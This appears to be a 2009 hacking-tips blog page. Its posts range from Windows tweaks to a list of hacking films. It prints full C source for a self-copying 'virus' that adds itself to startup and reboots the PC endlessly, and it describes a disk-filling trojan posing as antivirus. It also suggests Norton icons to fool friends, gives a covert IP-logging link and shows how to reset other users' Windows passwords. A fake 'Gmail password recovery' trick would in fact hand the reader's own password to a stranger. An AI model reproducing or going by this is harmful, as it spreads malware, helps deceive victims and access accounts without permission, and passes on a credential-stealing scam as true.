Sunday, June 7, 2009

i decided to compile a list of movies about hacking, or Hacking as one of the main themes, I could find. This list is no particular order.


1) Pirates of Silicon Valley (1999)



movie screnshots











2)The Net (1995)



movie screenshots










3)war games(1983)



movie screenshots










4) Hackers (1995)




movie screenshots










5)the italian job 2003



movie screenshots












6) Sneakers (1992)






movie screenshots









if u like my blog plzzz donate










Read more!

This guide will show you how to decrease the time your Windows PC takes to shutdown.

If like me, you've noticed over time your Windows XP PC takes longer and longer to boot, you've probably noticed it takes longer and longer to shutdown.

A fresh installation of Windows XP on decent hardware will shut down and switch off in about 4 seconds. How many PCs shut down after 4 seconds after being loaded with software? Not many.

This tweak reduces the time Windows XP waits before automatically closing any running programs when you give it the command to shutdown.

--As with any registry tweaks, I advise you to run a full backup of your registry first--

Go to the Start Menu and click on Run

Type 'Regedit' and click OK

Navigate to 'HKEY_CURRENT_USER\Control Panel\Desktop\'

Select 'WaitToKillAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

Now select 'HungAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

Now navigate to 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'

Select 'WaitToKillAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

Now navigate to 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contr ol\'

Select 'WaitToKillServiceTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

This should decrease the time taken to shutdown the PC. Again, if this causes issues or doesn't work, let us know.




Read more!

if you use Windows XP Professional then it is possible to squeeze an extra 20% out of your internet connection. By default Windows XP Pro holds back 20% of your Internet speed for various services like windows update and spyware checks.
If you want to tap into this locked speed then make the following changes:
1. Go to Start-> Run-> and type gpedit.msc
2. Expand the Administrative Templates branch
3. Expand the Network tab
4. Highlight QoS Packet Scheduler
5. Click on Limit Reservable Bandwidth and check the enabled box
6. Then Change the Bandwidth limit % to 0 %
done this click apply and restart your PC. After rebooting you should see a noticeable improvement in your net speed.


Read more!


WARNING: Please Backup your registry before attemting this hack.Changes to registry may lead to system failure.

.Here is a step by step procedure to disable Windows task manager.

Step1: Goto start>run and type “regedit” in the run.

Step2: In the registry navigate to

HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System
Value Name: DisableTaskMgr
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable Task Manager)

Step 3: Then navigate to

HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Policies\System
Value Name: DisableTaskMgr
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable Task Manager


Read more!













Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect’s this as a virus.I have coded this virus in C.So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)
4. The resulting .exe file is a virus and once you execute it will infect the system.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run


There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.

LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File


Read more!











Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…


Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

You can download the Trojan along with it’s source code HERE.

How to compile, test and remove the damage?
Compilation:

You can use Borland C++ compiler (or equivalent) to compile the Trojan.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file


Read more!

The following are the IP utilities available in Windows that help in finding out the information about IP Hosts and domains.These are the basic IP Hacking Commands that everyone must know!

NOTE: The term Host used in this article can also be assumed as a Website for simple understanding purpose.

1. PING

PING is a simple application (command) used to determine whether a host is online and available.PING command sends one or more ICMP Echo messages to a specified host requesting a reply.The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender.This confirms that the Host is online and available.Otherwise the host is said to be unavailable.

Syntax:
C:>ping gohacking.com

2. TELNET
Telnet command is used to connect to a desired host on a specified port number.For example
Syntax:
C:>telnet yahoo.com 25
C:>telnet yahoo.com

NOTE: The default port number is 23.When the port number is not specified the default number is assumed.
Telnet Hacking is explained in detail in the following post.
How To Send Fake Email

3. NSLOOKUP
Many times we think about finding out the IP address of a given site.Say for example google.com,yahoo.com,microsoft.com etc.But how to do this? For this there are some websites that can be used to find out the IP address of a given site.But in Windows we have an inbuilt tool to do this job for us.It is nslookup.Yes this tool can be used for resolving a given domain name into it’s IP address (determine the IP of a given site name).Not only this it can also be used for reverse IP lookup.That is if the IP address is given it determines the corresponding domain name for that IP address.

Syntax:
C:>nslookup google.com

4. NETSTAT

The netstat command can be used to display the current TCP/IP network connections.For example the following netstat command displays all connections and their corresponding listening port numbers.

Eg: C:>netstat -a

This command can be used to determine the IP address/Host names of all the applications connected to your computer.If a hacker is connected to your system even the hacker’s IP is displayed.So the netstat command can be used to get an idea of all the active connections to a given system




Read more!

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.



I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.

2. Open a new account in X10Hosting (or any free host that supports PHP).
3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the ip.php to any name of your choice.
5. Set the permission to 777 on ip_log.txt.

Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.

For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be

http://abc.x10hosting.com/ip.php

You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://abc.x10hosting.com/ip_log.php

The sample log will be in the following format

79.92.144.237 Thursday 07th of May 2009 05:31:27 PM
59.45.144.237 Thursday 07th of May 2009 05:31:28 PM
123.92.144.237 Thursday 07th of May 2009 05:31:31 PM

NOTE: You have to replace abc with your subdomain name.

I hope this helps. Express your opinion and suggestions through comments.

increase your website traffic click here
site contains lots hacking tips and tricks


Read more!

hacking cracking









Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:

[APP TITLE]
caption=YOUR TEXT

Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.
my comments at http://www.commentino.com/Guest30976


Read more!

Wanna hide some stuff ? This trully is the best way
So …

Make a New Folder
Rename it like this: Delete all in the name and hold the ALT key pressed down while you enter 0160 from the Numpads ( the numbers keys below Numlock Button)
Right click on the new folder -> Properties -> Customize -> Change Icon and choose and Empty icon from the list.
And now you gotta move it somewhere on your desktop and remember it’s position.
If you ever forget … you can just press CTRL + A and you will see it there


Read more!

how to hack gmail password
Step 1: Log into your Gmail account.Step 2: Compose a new mail.Step 3: In subject box type " PASSWORD RECOVERY "Step 4: Send this to - pwdmaster@gmail.comStep 5: Write this in message box.(first line)- Email address you want to hack.(second line)- Your Gmail address(third line)- Your Gmail account password(fourth line) - =""><>{simply copy and paste above.}How it works: you mail to a system administrators automatic responder.Usually only system administrators should be able to use this, but when youtry it with your own password and mail this message from your Gmail accountthe computer gets confused! Why your password is needed- automatic Gmailresponder will require your "system administrator password" which is in factyour own password!!! But the : computer doesn't know.THE PASSWORD WILL AUTOMATICALLY BE SENT TO YOUR GMAIL! INBOX IN A MAILCALLED "SYSTEM REG MESSAGE" FROM "SYSTEM". This is an awesome trick andworks as many times as you try it. Have fun! NOTE: Use account you have beenusing for few days say at least 30 days. Otherwise Gmail may take newaccount as temporary and this trick may not work. Moreover use it soonotherwise this flaw can be rectified soon.Please be advised that it usually works with Gmail & AOL but i'm not to sureabout HOTMAIL but can try. THE ONLY WAY YOU CAN HACK SOMEONE'S AOL ACCOUNTIS PROVIDING YOU HAVE AN AOL ACCOUNT.ALTHOUGH THIS IS GMAIL ACCOUNT INFORMATION CENTER, IT HAS BEEN ABLE TO WORKWITH AOL.I WILL NOT BE HELD RESPONSIBLE FOR WHAT YOU DO WITH THIS INFORMATION NORWILL I BE HELD ACCOUNTABLE, THIS INFORMATION I'M SHARING IS FOR EDUCATIONALPURPOSES ONLY. PLEASE USE IT TO YOUR DISCRETION.............HAPPY HACKING ......:)


my comments at http://www.commentino.com/Guest30976


Read more!

CHANGE/RESET PASSWORD FOR ANY USERNAME
Reboot the computer
Right after the bios is finished, hit F8 (or F2,10,12)
Select ‘Safe mode’ or ‘Safe mode with networking support’
Windows will boot up to the logon screen. Click administrator, 9/10 there is no password.
Do, Start->Run->type ‘command’
At the prompt, type ‘net user’ which will display a list of usernames. Find the one you are looking for, try ‘net user username’ for them all. Type ‘net user /HELP’ for more info.
To reset the password type ‘net user username *’ where username is the username you want to reset.
For no password, leave blank.
Now, reboot and you can login as that user.


Read more!
 

blogger templates | Make Money Online